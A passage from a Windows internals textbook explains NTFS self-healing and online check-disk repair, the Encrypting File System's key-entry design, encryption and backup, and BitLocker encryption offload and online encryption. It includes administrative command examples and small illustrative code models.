Self healing state on c: is: 0x9
Values: 0x1 - Enable general repair.
0x9 - Enable repair and warn about potential data loss.
0x10 - Disable repair and bugcheck once on first corruption.
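The state value is a bitmask of the flags shown in the legend above. As an illustrative sketch (the structure and helper below are hypothetical, not from any Windows header), the 0x9 value decodes as general repair plus the data-loss warning:

```c
#include <stdint.h>

/* Decode the self-healing state bitmask printed by "fsutil repair query".
 * The flag values mirror the legend in the command output; the names and
 * this helper are illustrative, not taken from a Windows header. */
struct repair_state {
    int enabled;    /* 0x01: enable general repair */
    int warn;       /* 0x08: warn about potential data loss (0x9 = 0x1 | 0x8) */
    int bugcheck;   /* 0x10: disable repair, bugcheck once on first corruption */
};

static struct repair_state decode_repair_state(uint32_t v)
{
    struct repair_state s;
    s.enabled  = (v & 0x01) != 0;
    s.warn     = (v & 0x08) != 0;
    s.bugcheck = (v & 0x10) != 0;
    return s;
}
```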
Online check-disk and fast repair
Rare cases in which disk corruption is not managed by the NTFS file system driver (through self-healing, the Log File Service, and so on) require the system to run the Windows Check Disk tool and take the volume offline. Disk corruption has a variety of causes: whether produced by hard-disk media errors or by transient memory errors, corruption can appear in file system metadata. On large file servers, which can have multiple terabytes of disk space, running a complete Check Disk can take days, and keeping a volume offline for that long is typically not acceptable.
Before Windows 8, NTFS implemented a simpler health model, where the file system volume was
either healthy or not (through the dirty bit stored in the VOLUME_INFORMATION attribute). In that
model, the volume was taken offline for as long as necessary to fix the file system corruptions and bring
the volume back to a healthy state. Downtime was directly proportional to the number of files in the
volume. Windows 8, with the goal of reducing or avoiding the downtime caused by file system corrup-
tion, has redesigned the NTFS health model and disk check.
The new model introduces new components that cooperate to provide an online check-disk tool and
to drastically reduce the downtime in case severe file-system corruption is detected. The NTFS file system
driver is able to identify multiple types of corruption during normal system I/O. If a corruption is detected,
NTFS tries to self-heal it (see the previous paragraph). If it doesn’t succeed, the NTFS file system driver
writes a new corruption record to the Verify stream of the \Extend\RmMetadata\Repair file.
A corruption record is a common data structure that NTFS uses for describing metadata corruptions
and is used both in-memory and on-disk. A corruption record consists of a fixed-size header, which contains version information, flags, and a GUID that uniquely identifies the record type, followed by a variable-sized description of the corruption that occurred and an optional context.
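The exact on-disk layout is not documented here, but the description above can be sketched as a hypothetical C structure (all field names and sizes are illustrative, not the real NTFS format):

```c
#include <stdint.h>

/* Hypothetical sketch of a corruption record, following the description in
 * the text: a fixed-size header with version, flags, and a type GUID, then
 * a variable-sized description and optional context. */
typedef struct {
    uint32_t data1;
    uint16_t data2, data3;
    uint8_t  data4[8];
} guid_t;                        /* 16-byte GUID */

typedef struct {
    uint16_t version;            /* record format version */
    uint16_t flags;              /* record state flags */
    guid_t   record_type;        /* uniquely identifies the record type */
    uint32_t description_len;    /* bytes of variable-sized description that follow */
    /* followed by: description[description_len], then an optional context */
} corruption_record_header_t;
```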
After the entry has been correctly added, NTFS emits an ETW event through its own event provider
(named Microsoft-Windows-Ntfs-UBPM). This ETW event is consumed by the service control manager,
which will start the Spot Verifier service (more details about triggered-start services are available in
Chapter 10).
The Spot Verifier service (implemented in the Svsvc.dll library) verifies that the signaled corruption is
not a false positive (some corruptions are intermittent due to memory issues and may not be a result of
an actual corruption on disk). Entries in the Verify stream are removed while being verified by the Spot
Verifier. If the corruption (described by the entry) is not a false positive, the Spot Verifier triggers the
Proactive Scan Bit (P-bit) in the VOLUME_INFORMATION attribute of the volume, which will trigger
an online scan of the file system. The online scan is executed by the Proactive Scanner, which is run as a
maintenance task by the Windows task scheduler (the task is located in Microsoft\Windows\Chkdsk, as
shown in Figure 11-66) when the time is appropriate.
FIGURE 11-66 The Proactive Scan maintenance task.
The Proactive scanner is implemented in the Untfs.dll library, which is imported by the Windows
Check Disk tool (Chkdsk.exe). When the Proactive Scanner runs, it takes a snapshot of the target volume
through the Volume Shadow Copy service and runs a complete Check Disk on the shadow volume.
The shadow volume is read-only; the check disk code detects this and, instead of directly fixing the
errors, uses the self-healing feature of NTFS to try to automatically fix the corruption. If it fails, it sends
a FSCTL_CORRUPTION_HANDLING code to the file system driver, which in turn creates an entry in the
Corrupt stream of the \Extend\RmMetadata\Repair metadata file and sets the volume’s dirty bit.
The dirty bit has a slightly different meaning compared to previous editions of Windows. The VOLUME
_INFORMATION attribute of the NTFS root namespace still contains the dirty bit, but also contains the
P-bit, which is used to require a Proactive Scan, and the F-bit, which is used to require a full check disk
due to the severity of a particular corruption. The dirty bit is set to 1 by the file system driver if the P-bit
or the F-bit are enabled, or if the Corrupt stream contains one or more corruption records.
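The dirty-bit rule just described can be stated as a tiny predicate. This is a sketch of the logic only; the names are illustrative, not NTFS structures:

```c
#include <stdbool.h>
#include <stddef.h>

/* The volume is marked dirty when the P-bit (proactive scan requested) or
 * the F-bit (full check disk requested) is set, or when the Corrupt stream
 * holds at least one corruption record. */
static bool volume_is_dirty(bool p_bit, bool f_bit, size_t corrupt_records)
{
    return p_bit || f_bit || corrupt_records > 0;
}
```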
If the corruption is still not resolved at this stage, the only remaining option is to fix it while the volume is offline (though this does not necessarily require an immediate volume dismount). The Spot Fixer
is a new component that is shared between the Check Disk and the Autocheck tool. The Spot Fixer
consumes the records inserted in the Corrupt stream by the Proactive scanner. At boot time, the
Autocheck native application detects that the volume is dirty, but, instead of running a full check disk,
it fixes only the corrupted entries located in the Corrupt stream, an operation that requires only a few
seconds. Figure 11-67 summarizes the repair methodologies implemented by the previously described components of the NTFS file system.
FIGURE 11-67 A scheme that describes the components that cooperate to provide online check disk
and fast corruption repair for NTFS volumes.
A Proactive scan can be manually started for a volume through the chkdsk /scan command. In the same
way, the Spot Fixer can be executed by the Check Disk tool using the spotfix command-line argument.
EXPERIMENT: Testing the online disk check
You can test the online checkdisk by performing a simple experiment. Assuming that you would
like to execute an online checkdisk on the D: volume, start by playing a large video stream from
the D drive. In the meantime, open an administrative command prompt window and start an
online checkdisk through the following command:
C:\>chkdsk d: /scan
The type of the file system is NTFS.
Volume label is DATA.
Stage 1: Examining basic file system structure ...
4041984 file records processed.
File verification completed.
3778 large file records processed.
0 bad file records processed.
Stage 2: Examining file name linkage ...
Progress: 3454102 of 4056090 done; Stage: 85%; Total: 51%; ETA: 0:00:43 ..
You will find that the video stream won’t be stopped and continues to play smoothly. In case
the online checkdisk finds an error that it isn’t able to correct while the volume is mounted, it will
be inserted in the Corrupt stream of the Repair system file. To fix the errors, a volume dismount
is needed, but the correction will be very fast. In that case, you could simply reboot the machine
or manually execute the Spot Fixer through the command line:
C:\>chkdsk d: /spotfix
In case you choose to execute the Spot Fixer, you will find that the video stream will be inter-
rupted, because the volume needs to be unmounted.
Encrypted file system
Windows includes a full-volume encryption feature called Windows BitLocker Drive Encryption.
BitLocker encrypts and protects volumes from offline attacks, but once a system is booted, BitLocker’s
job is done. The Encrypting File System (EFS) protects individual files and directories from other au-
thenticated users on a system. When choosing how to protect your data, it is not an either/or choice
between BitLocker and EFS; each provides protection from specific—and nonoverlapping—threats.
Together, BitLocker and EFS provide a “defense in depth” for the data on your system.
The paradigm used by EFS is to encrypt files and directories using symmetric encryption (a single
key that is used for encrypting and decrypting the file). The symmetric encryption key is then encrypt-
ed using asymmetric encryption (one key for encryption—often referred to as the public key—and a
different key for decryption—often referred to as the private key) for each user who is granted access
to the file. The details and theory behind these encryption methods is beyond the scope of this book;
however, a good primer is available at https://docs.microsoft.com/en-us/windows/desktop/SecCrypto/
cryptography-essentials.
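The hybrid scheme can be modeled in a few lines. The sketch below uses XOR as a stand-in for both the symmetric (AES) and asymmetric (RSA) ciphers, purely to show the data flow of a single per-file key wrapped once per user; it has no cryptographic strength, and none of these names are EFS APIs:

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

enum { FEK_LEN = 32 };   /* toy file encryption key length */

/* XOR a buffer with a repeating key (placeholder for a real cipher). */
static void xor_buf(uint8_t *dst, const uint8_t key[FEK_LEN], size_t len)
{
    for (size_t i = 0; i < len; i++)
        dst[i] ^= key[i % FEK_LEN];
}

/* "Symmetric" step: the FEK encrypts (and, applied again, decrypts) data. */
static void encrypt_data(uint8_t *data, size_t len, const uint8_t fek[FEK_LEN])
{
    xor_buf(data, fek, len);
}

/* "Asymmetric" step: each user granted access gets their own wrapped copy
 * of the FEK, made with that user's key. */
static void wrap_fek(uint8_t wrapped[FEK_LEN], const uint8_t fek[FEK_LEN],
                     const uint8_t user_key[FEK_LEN])
{
    memcpy(wrapped, fek, FEK_LEN);
    xor_buf(wrapped, user_key, FEK_LEN);
}
```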
EFS works with the Windows Cryptography Next Generation (CNG) APIs, and thus may be con-
figured to use any algorithm supported by (or added to) CNG. By default, EFS will use the Advanced
Encryption Standard (AES) for symmetric encryption (256-bit key) and the Rivest-Shamir-Adleman
(RSA) public key algorithm for asymmetric encryption (2,048-bit keys).
Users can encrypt files via Windows Explorer by opening a file’s Properties dialog box, clicking
Advanced, and then selecting the Encrypt Contents To Secure Data option, as shown in Figure 11-
68. (A file may be encrypted or compressed, but not both.) Users can also encrypt files via a command-
line utility named Cipher (%SystemRoot%\System32\Cipher.exe) or programmatically using Windows
APIs such as EncryptFile and AddUsersToEncryptedFile.
Windows automatically encrypts files that reside in directories that are designated as encrypted
directories. When a file is encrypted, EFS generates a random number for the file that EFS calls the file’s
File Encryption Key (FEK). EFS uses the FEK to encrypt the file’s contents using symmetric encryption. EFS
then encrypts the FEK using the user’s asymmetric public key and stores the encrypted FEK in the EFS
alternate data stream for the file. The source of the public key may be administratively specified to come from an assigned X.509 certificate or a smartcard, or the key pair can be randomly generated (in which case it is added to the user's certificate store, which can be viewed using the Certificate Manager, %SystemRoot%\System32\Certmgr.msc). After EFS completes these steps, the file is secure; other users can't decrypt the data without the file's decrypted FEK, and they can't decrypt the FEK without the user's private key.
FIGURE 11-68 Encrypt files by using the Advanced Attributes dialog box.
Symmetric encryption algorithms are typically very fast, which makes them suitable for encrypting
large amounts of data, such as file data. However, symmetric encryption algorithms have a weakness:
You can bypass their security if you obtain the key. If multiple users want to share one encrypted file
protected only using symmetric encryption, each user would require access to the file’s FEK. Leaving
the FEK unencrypted would obviously be a security problem, but encrypting the FEK once would re-
quire all the users to share the same FEK decryption key—another potential security problem.
Keeping the FEK secure is a difficult problem, which EFS addresses with the public key–based half of
its encryption architecture. Encrypting a file’s FEK for individual users who access the file lets multiple
users share an encrypted file. EFS can encrypt a file’s FEK with each user’s public key and can store each
user’s encrypted FEK in the file’s EFS data stream. Anyone can access a user’s public key, but no one
can use a public key to decrypt the data that the public key encrypted. The only way users can decrypt
a file is with their private key, which the operating system must access. A user’s private key decrypts the
user’s encrypted copy of a file’s FEK. Public key–based algorithms are usually slow, but EFS uses these
algorithms only to encrypt FEKs. Splitting key management between a publicly available key and a
private key makes key management a little easier than symmetric encryption algorithms do and solves
the dilemma of keeping the FEK secure.
Several components work together to make EFS work, as the diagram of EFS architecture in Figure 11-69
shows. EFS support is merged into the NTFS driver. Whenever NTFS encounters an encrypted file, NTFS
executes EFS functions that it contains. The EFS functions encrypt and decrypt file data as applications
access encrypted files. Although EFS stores an FEK with a file’s data, users’ public keys encrypt the FEK.
To encrypt or decrypt file data, EFS must decrypt the file’s FEK with the aid of CNG key management
services that reside in user mode.
FIGURE 11-69 EFS architecture. (The diagram shows the user-mode EFS service hosted in LSA alongside the user key store, registry settings, and group policy; the kernel-mode EFS helper library and NTFS; and the EFSRPC interfaces connecting Windows 10 and downlevel clients, the EFS service, and the file system, with plaintext file I/O above NTFS and ciphertext on disk.)
The Local Security Authority Subsystem (LSASS, %SystemRoot%\System32\Lsass.exe) manages
logon sessions but also hosts the EFS service (Efssvc.dll). For example, when EFS needs to decrypt a FEK
to decrypt file data a user wants to access, NTFS sends a request to the EFS service inside LSASS.
Encrypting a file for the first time
The NTFS driver calls its EFS helper functions when it encounters an encrypted file. A file’s attributes re-
cord that the file is encrypted in the same way that a file records that it’s compressed (discussed earlier
in this chapter). NTFS has specific interfaces for converting a file from nonencrypted to encrypted form,
but user-mode components primarily drive the process. As described earlier, Windows lets you encrypt
a file in two ways: by using the cipher command-line utility or by checking the Encrypt Contents To
Secure Data check box in the Advanced Attributes dialog box for a file in Windows Explorer. Both
Windows Explorer and the cipher command rely on the EncryptFile Windows API.
EFS stores only one block of information in an encrypted file, and that block contains an entry for
each user sharing the file. These entries are called key entries, and EFS stores them in the data decryp-
tion field (DDF) portion of the file’s EFS data. A collection of multiple key entries is called a key ring
because, as mentioned earlier, EFS lets multiple users share encrypted files.
Figure 11-70 shows a file’s EFS information format and key entry format. EFS stores enough informa-
tion in the first part of a key entry to precisely describe a user’s public key. This data includes the user’s
security ID (SID) (note that the SID is not guaranteed to be present), the container name in which the
key is stored, the cryptographic provider name, and the asymmetric key pair certificate hash. Only the
asymmetric key pair certificate hash is used by the decryption process. The second part of the key entry
contains an encrypted version of the FEK. EFS uses the CNG to encrypt the FEK with the selected asym-
metric encryption algorithm and the user’s public key.
FIGURE 11-70 Format of EFS information and key entries. (The EFS information consists of a header with version, checksum, and DDF/DRF key-entry counts, followed by the DDF and DRF key entries; each key entry contains the user SID, container name, provider name, EFS certificate hash, and the encrypted FEK.)
EFS stores information about recovery key entries in a file’s data recovery field (DRF). The format of
DRF entries is identical to the format of DDF entries. The DRF’s purpose is to let designated accounts, or
recovery agents, decrypt a user’s file when administrative authority must have access to the user’s data.
For example, suppose a company employee forgot his or her logon password. An administrator can
reset the user’s password, but without recovery agents, no one can recover the user’s encrypted data.
Recovery agents are defined with the Encrypted Data Recovery Agents security policy of the local
computer or domain. This policy is available from the Local Security Policy MMC snap-in, as shown in
Figure 11-71. When you use the Add Recovery Agent Wizard (by right-clicking Encrypting File System
and then clicking Add Data Recovery Agent), you can add recovery agents and specify which private/
public key pairs (designated by their certificates) the recovery agents use for EFS recovery. Lsasrv (Local
Security Authority service, which is covered in Chapter 7 of Part 1) interprets the recovery policy when it
initializes and when it receives notification that the recovery policy has changed. EFS creates a DRF key
entry for each recovery agent by using the cryptographic provider registered for EFS recovery.
FIGURE 11-71 Encrypted Data Recovery Agents group policy.
A user can create their own Data Recovery Agent (DRA) certificate by using the cipher /r com-
mand. The generated private certificate file can be imported by the Recovery Agent Wizard and by the
Certificates snap-in of the domain controller or the machine on which the administrator should be able
to decrypt encrypted files.
As the final step in creating EFS information for a file, Lsasrv calculates a checksum for the DDF and
DRF by using the MD5 hash facility of Base Cryptographic Provider 1.0. Lsasrv stores the checksum’s
result in the EFS information header. EFS references this checksum during decryption to ensure that the
contents of a file’s EFS information haven’t become corrupted or been tampered with.
Encrypting file data
When a user encrypts an existing file, the following process occurs:
1. The EFS service opens the file for exclusive access.
2. All data streams in the file are copied to a plaintext temporary file in the system's temporary directory.
3. A FEK is randomly generated and used to encrypt the file by using AES-256.
4. A DDF is created to contain the FEK encrypted by using the user's public key. EFS automatically obtains the user's public key from the user's X.509 version 3 file encryption certificate.
5. If a recovery agent has been designated through Group Policy, a DRF is created to contain the FEK encrypted by using RSA and the recovery agent's public key.
6. EFS automatically obtains the recovery agent's public key for file recovery from the recovery agent's X.509 version 3 certificate, which is stored in the EFS recovery policy. If there are multiple recovery agents, a copy of the FEK is encrypted by using each agent's public key, and a DRF is created to store each encrypted FEK.
Note The file recovery property in the certificate is an example of an enhanced
key usage (EKU) field. An EKU extension and extended property specify and limit
the valid uses of a certificate. File Recovery is one of the EKU fields defined by
Microsoft as part of the Microsoft public key infrastructure (PKI).
7. EFS writes the encrypted data, along with the DDF and the DRF, back to the file. Because symmetric encryption does not add additional data, file size increase is minimal after encryption. The metadata, consisting primarily of encrypted FEKs, is usually less than 1 KB. File size in bytes before and after encryption is normally reported to be the same.
8. The plaintext temporary file is deleted.
When a user saves a file to a folder that has been configured for encryption, the process is similar
except that no temporary file is created.
The decryption process
When an application accesses an encrypted file, decryption proceeds as follows:
1. NTFS recognizes that the file is encrypted and sends a request to the EFS driver.
2. The EFS driver retrieves the DDF and passes it to the EFS service.
3. The EFS service retrieves the user's private key from the user's profile and uses it to decrypt the DDF and obtain the FEK.
4. The EFS service passes the FEK back to the EFS driver.
5. The EFS driver uses the FEK to decrypt sections of the file as needed for the application.
Note When an application opens a file, only those sections of the file that the ap-
plication is using are decrypted because EFS uses cipher block chaining. The be-
havior is different if the user removes the encryption attribute from the file. In this
case, the entire file is decrypted and rewritten as plaintext.
6. The EFS driver returns the decrypted data to NTFS, which then sends the data to the requesting application.
Backing up encrypted files
An important aspect of any file encryption facility’s design is that file data is never available in un-
encrypted form except to applications that access the file via the encryption facility. This restriction
particularly affects backup utilities, in which archival media store files. EFS addresses this problem by
providing a facility for backup utilities so that the utilities can back up and restore files in their encrypt-
ed states. Thus, backup utilities don’t have to be able to decrypt file data, nor do they need to encrypt
file data in their backup procedures.
Backup utilities use the EFS API functions OpenEncryptedFileRaw, ReadEncryptedFileRaw, WriteEncryptedFileRaw, and CloseEncryptedFileRaw in Windows to access a file's encrypted contents. After a backup utility opens a file for raw access during a backup operation, the utility calls ReadEncryptedFileRaw to obtain the file data. All the EFS backup APIs work by issuing FSCTLs to the NTFS file system driver. For example, the ReadEncryptedFileRaw API first reads the EFS stream by issuing an FSCTL_ENCRYPTION_FSCTL_IO control code to the NTFS driver and then reads all of the file's streams (including the DATA stream and optional alternate data streams); in case a stream is encrypted, the ReadEncryptedFileRaw API uses the FSCTL_READ_RAW_ENCRYPTED control code to request the encrypted stream data from the file system driver.
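The raw-backup pattern (the API streams opaque encrypted chunks to a caller-supplied export callback, so the backup tool never handles plaintext) can be sketched portably. The names below mimic the ReadEncryptedFileRaw contract but form a standalone mock, not the Win32 API:

```c
#include <stddef.h>

/* Export callback: receives each encrypted chunk as-is. Returning nonzero
 * aborts the export, mirroring the Win32 callback's error convention. */
typedef int (*export_cb)(const unsigned char *chunk, size_t len, void *ctx);

/* Mock of a raw read: walk the ciphertext in fixed-size chunks and hand
 * each one to the callback without ever decrypting it. */
static int read_raw(const unsigned char *cipher, size_t total,
                    size_t chunk, export_cb cb, void *ctx)
{
    for (size_t off = 0; off < total; off += chunk) {
        size_t n = (total - off < chunk) ? total - off : chunk;
        int err = cb(cipher + off, n, ctx);   /* ciphertext delivered as-is */
        if (err)
            return err;
    }
    return 0;
}
```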
EXPERIMENT: Viewing EFS information
EFS has a handful of other API functions that applications can use to manipulate encrypted files.
For example, applications use the AddUsersToEncryptedFile API function to give additional users
access to an encrypted file and RemoveUsersFromEncryptedFile to revoke users’ access to an
encrypted file. Applications use the QueryUsersOnEncryptedFile function to obtain information
about a file’s associated DDF and DRF key fields. QueryUsersOnEncryptedFile returns the SID,
certificate hash value, and display information that each DDF and DRF key field contains. The fol-
lowing output is from the EFSDump utility, from Sysinternals, when an encrypted file is specified
as a command-line argument:
C:\Andrea>efsdump Test.txt
EFS Information Dumper v1.02
Copyright (C) 1999 Mark Russinovich
Systems Internals - http://www.sysinternals.com
C:\Andrea\Test.txt:
DDF Entries:
WIN-46E4EFTBP6Q\Andrea:
Andrea(Andrea@WIN-46E4EFTBP6Q)
Unknown user:
Tony(Tony@WIN-46E4EFTBP6Q)
DRF Entry:
Unknown user:
EFS Data Recovery
You can see that the file Test.txt has two DDF entries for the users Andrea and Tony and one
DRF entry for the EFS Data Recovery agent, which is the only recovery agent currently registered
on the system. You can use the cipher tool to add or remove users in the DDF entries of a file. For
example, the command
cipher /adduser /user:Tony Test.txt
enables the user Tony to access the encrypted file Test.txt (adding an entry in the DDF of the file).
Copying encrypted files
When an encrypted file is copied, the system doesn’t decrypt the file and re-encrypt it at its destina-
tion; it just copies the encrypted data and the EFS alternate data stream to the specified destination.
However, if the destination does not support alternate data streams—if it is not an NTFS volume (such
as a FAT volume) or is a network share (even if the network share is an NTFS volume)—the copy cannot
proceed normally because the alternate data streams would be lost. If the copy is done with Explorer, a
dialog box informs the user that the destination volume does not support encryption and asks the user
whether the file should be copied to the destination unencrypted. If the user agrees, the file will be de-
crypted and copied to the specified destination. If the copy is done from a command prompt, the copy
command will fail and return the error message “The specified file could not be encrypted.”
BitLocker encryption offload
The NTFS file system driver uses services provided by the Encrypting File System (EFS) to perform
file encryption and decryption. These kernel-mode services, which communicate with the user-mode
encrypting file service (Efssvc.dll), are provided to NTFS through callbacks. When a user or application
encrypts a file for the first time, the EFS service sends a FSCTL_SET_ENCRYPTION control code to the
NTFS driver. The NTFS file system driver uses the "write" EFS callback to perform in-memory encryption of the data located in the original file. The actual encryption process splits the file content, which is usually processed in 2-MB blocks, into small 512-byte chunks. The EFS library uses
the BCryptEncrypt API to actually encrypt the chunk. As previously mentioned, the encryption engine
is provided by the Kernel CNG driver (Cng.sys), which supports the AES or 3DES algorithms used by
EFS (along with many more). As EFS encrypts each 512-byte chunk (which is the smallest physical size
of standard hard disk sectors), at every round it updates the IV (initialization vector, also known as salt
value, which is a 128-bit number used to provide randomization to the encryption scheme), using the
byte offset of the current block.
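The per-chunk IV derivation can be sketched as follows. The mixing function is illustrative (the exact EFS formula is not given here); the point is that the IV depends on the 512-byte chunk's byte offset, so identical plaintext at different offsets encrypts differently:

```c
#include <stdint.h>
#include <string.h>

enum { CHUNK = 512, IV_LEN = 16 };   /* 512-byte chunks, 128-bit IV */

/* Derive a per-chunk IV from a base salt and the chunk's byte offset.
 * The folding step is a stand-in for whatever mixing EFS actually does. */
static void derive_iv(uint8_t iv[IV_LEN], const uint8_t salt[IV_LEN],
                      uint64_t byte_offset)
{
    uint64_t chunk_off = byte_offset - (byte_offset % CHUNK); /* align down */
    memcpy(iv, salt, IV_LEN);
    for (int i = 0; i < 8; i++)          /* fold the offset into the IV */
        iv[i] ^= (uint8_t)(chunk_off >> (8 * i));
}
```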
In Windows 10, encryption performance has improved thanks to BitLocker encryption offload. When
BitLocker is enabled, the storage stack already includes a device created by the Full Volume Encryption
Driver (Fvevol.sys), which, if the volume is encrypted, performs real-time encryption/decryption on
physical disk sectors; otherwise, it simply passes through the I/O requests.
The NTFS driver can defer the encryption of a file by using IRP Extensions. IRP Extensions are pro-
vided by the I/O manager (more details about the I/O manager are available in Chapter 6 of Part 1) and
are a way to store different types of additional information in an IRP. At file creation time, the EFS driver
probes the device stack to check whether the BitLocker control device object (CDO) is present (by us-
ing the IOCTL_FVE_GET_CDOPATH control code), and, if so, it sets a flag in the SCB, indicating that the
stream can support encryption offload.
Every time an encrypted file is read or written, or when a file is encrypted for the first time, the NTFS
driver, based on the previously set flag, determines whether it needs to encrypt/decrypt each file block.
In case encryption offload is enabled, NTFS skips the call to EFS; instead, it adds an IRP extension to the
IRP that will be sent to the related volume device for performing the physical I/O. In the IRP extension,
the NTFS file system driver stores the starting virtual byte offset of the block of the file that the stor-
age driver is going to read or write, its size, and some flags. The NTFS driver finally emits the I/O to the
related volume device by using the IoCallDriver API.
The volume manager will parse the IRP and send it to the correct storage driver. The BitLocker driver
recognizes the IRP extension and encrypts the data that NTFS has sent down to the device stack, using
its own routines, which operate on physical sectors. (BitLocker, as a volume filter driver, doesn't implement the concept of files and directories.) Some storage drivers, such as the Logical Disk Manager
driver (VolmgrX.sys, which provides dynamic disk support) are filter drivers that attach to the volume
device objects. These drivers reside below the volume manager but above the BitLocker driver, and
they can provide data redundancy, striping, or storage virtualization, characteristics which are usually
implemented by splitting the original IRP into multiple secondary IRPs that will be emitted to differ-
ent physical disk devices. In this case, the secondary I/Os, when intercepted by the BitLocker driver, will
result in data encrypted by using a different salt value that would corrupt the file data.
IRP extensions support the concept of IRP propagation, which automatically modifies the file virtual
byte offset stored in the IRP extension every time the original IRP is split. Normally, the EFS driver encrypts
file blocks on 512-byte boundaries, and the IRP can’t be split on an alignment less than a sector size. As a
result, BitLocker can correctly encrypt and decrypt the data, ensuring that no corruption will happen.
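The offset propagation can be sketched with a helper that splits one I/O into sector-sized children, each carrying the file virtual byte offset of its own slice (the structures are illustrative, not I/O-manager types):

```c
#include <stdint.h>

enum { SECTOR = 512 };   /* IRPs can't be split below sector alignment */

/* Stand-in for the per-IRP extension data described in the text. */
typedef struct {
    uint64_t file_offset;   /* virtual byte offset carried by this child */
    uint64_t length;
} io_range_t;

/* Split [offset, offset + length) into at most 'cap' sector-sized children,
 * propagating the adjusted file offset into each one so a lower encryption
 * filter can still derive the right per-sector IV. Returns the count. */
static int split_io(uint64_t offset, uint64_t length, io_range_t *out, int cap)
{
    int n = 0;
    while (length > 0 && n < cap) {
        uint64_t piece = length < SECTOR ? length : SECTOR;
        out[n].file_offset = offset;   /* each child's own slice offset */
        out[n].length = piece;
        offset += piece;
        length -= piece;
        n++;
    }
    return n;
}
```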
Many of the BitLocker driver's routines can't tolerate memory failures. However, since the IRP extension is dynamically allocated from the nonpaged pool when the IRP is split, the allocation can fail. The I/O
manager resolves this problem with the IoAllocateIrpEx routine. This routine can be used by kernel
drivers for allocating IRPs (like the legacy IoAllocateIrp). But the new routine allocates an extra stack
location and stores any IRP extensions in it. Drivers that request an IRP extension on IRPs allocated by
the new API no longer need to allocate new memory from the nonpaged pool.
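The propagation rule can be sketched with a toy model (plain Python; the class and function names are invented for illustration and do not correspond to the kernel's actual IRP structures):

```python
SECTOR_SIZE = 512  # EFS encrypts file blocks on 512-byte boundaries

class ToyIrp:
    """A toy stand-in for an IRP carrying a file-offset extension."""
    def __init__(self, file_offset, length):
        assert file_offset % SECTOR_SIZE == 0  # splits stay sector-aligned
        self.file_offset = file_offset  # virtual byte offset within the file
        self.length = length

def split_irp(irp, split_at):
    """Split one I/O into two secondary I/Os, propagating the extension so
    each half still knows its own virtual file offset."""
    assert 0 < split_at < irp.length and split_at % SECTOR_SIZE == 0
    first = ToyIrp(irp.file_offset, split_at)
    second = ToyIrp(irp.file_offset + split_at, irp.length - split_at)
    return first, second

# A 1-MiB write starting at file offset 4 MiB, split for two physical disks:
a, b = split_irp(ToyIrp(4 * 1024 * 1024, 1024 * 1024), 512 * 1024)
print(a.file_offset, b.file_offset)  # 4194304 4718592
```

Because each secondary I/O carries the adjusted offset, an encryption filter below the split can always derive the correct sector-relative values.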
Note A storage driver can decide to split an IRP for different reasons—whether or not it
needs to send multiple I/Os to multiple physical devices. The Volume Shadow Copy Driver
(Volsnap.sys), for example, splits the I/O when it needs to read a file from a copy-on-write volume shadow copy, if the file resides in different sections: on the live volume and
on the Shadow Copy’s differential file (which resides in the System Volume Information
hidden directory).
CHAPTER 11
Caching and file systems
719
Online encryption support
When a file stream is encrypted or decrypted, it is exclusively locked by the NTFS file system driver. This
means that no applications can access the file during the entire encryption or decryption process. For
large files, this limitation can break the file’s availability for many seconds—or even minutes. Clearly
this is not acceptable for large file-server environments.
To resolve this, recent versions of Windows 10 introduced online encryption support. With the right synchronization, the NTFS driver is able to perform file encryption and decryption without retaining
exclusive file access. EFS enables online encryption only if the target encryption stream is a data stream
(named or unnamed) and is nonresident. (Otherwise, a standard encryption process starts.) If both condi-
tions are satisfied, the EFS service sends a FSCTL_SET_ENCRYPTION control code to the NTFS driver to set
a flag that enables online encryption.
Online encryption is possible thanks to the EfsBackup attribute (of type LOGGED_UTILITY_STREAM)
and to the introduction of range locks, a new feature that allows the file system driver to lock (in an
exclusive or shared mode) only a portion of a file. When online encryption is enabled, the
NtfsEncryptDecryptOnline internal function starts the encryption and decryption process by creating
the EfsBackup attribute (and its SCB) and by acquiring a shared lock on the first 2-MB range of the file.
A shared lock means that multiple readers can still read from the file range, but other writers need to
wait until the end of the encryption or decryption operation before they can write new data.
The NTFS driver allocates a 2-MB buffer from the nonpaged pool and reserves some clusters from
the volume, which are needed to represent 2 MB of free space. (The total number of clusters depends
on the volume cluster’s size.) The online encryption function reads the original data from the physical
disk and stores it in the allocated buffer. If BitLocker encryption offload is not enabled (described in the
previous section), the buffer is encrypted using EFS services; otherwise, the BitLocker driver encrypts
the data when the buffer is written to the previously reserved clusters.
At this stage, NTFS locks the entire file for a brief amount of time: only the time needed to remove
the clusters containing the unencrypted data from the original stream’s extent table, assign them to
the EfsBackup non-resident attribute, and replace the removed range of the original stream’s extent
table with the new clusters that contain the newly encrypted data. Before releasing the exclusive lock,
the NTFS driver calculates a new high watermark value and stores it both in the original file in-memory
SCB and in the EFS payload of the EFS alternate data stream. NTFS then releases the exclusive lock. The
clusters that contain the original data are first zeroed out; then, if there are no more blocks to process,
they are eventually freed. Otherwise, the online encryption cycle restarts with the next 2-MB chunk.
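The chunked cycle and the cluster-reservation arithmetic can be sketched as follows (a Python toy model; the names are invented, and a real cycle also performs the locking and cluster remapping described above):

```python
CHUNK = 2 * 1024 * 1024  # online encryption processes 2-MB ranges

def clusters_for_chunk(cluster_size):
    """Clusters reserved to hold one 2-MB chunk of re-encrypted data."""
    return CHUNK // cluster_size

def encryption_cycles(file_size):
    """Yield the (start, end) ranges processed by successive cycles,
    i.e. the positions the high watermark moves through."""
    offset = 0
    while offset < file_size:
        end = min(offset + CHUNK, file_size)
        yield offset, end
        offset = end  # watermark advances after the brief exclusive lock

print(clusters_for_chunk(4096))  # 512 clusters on a 4-KB-cluster volume
print(list(encryption_cycles(5 * 1024 * 1024))[-1])  # final, partial chunk
```

For a 5-MB file, the last cycle covers only the trailing 1 MB, after which the watermark reaches the end of the stream and the reserved clusters are freed.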
The high watermark value stores the file offset that represents the boundary between encrypted
and nonencrypted data. Any concurrent write beyond the watermark can occur in its original form;
other concurrent writes before the watermark need to be encrypted before they can succeed. Writes to
the current locked range are not allowed. Figure 11-72 shows an example of an ongoing online encryp-
tion for a 16-MB file. The first two blocks (2 MB in size) already have been encrypted; the high water-
mark value is set to 4 MB, dividing the file between its encrypted and non-encrypted data. A range lock
is set on the 2-MB block that follows the high watermark. Applications can still read from that block,
but they can’t write any new data (in the latter case, they need to wait). The block’s data is encrypted
and stored in reserved clusters. When exclusive file ownership is taken, the original block’s clusters are
remapped to the EfsBackup stream (by removing or splitting their entry in the original file’s extent
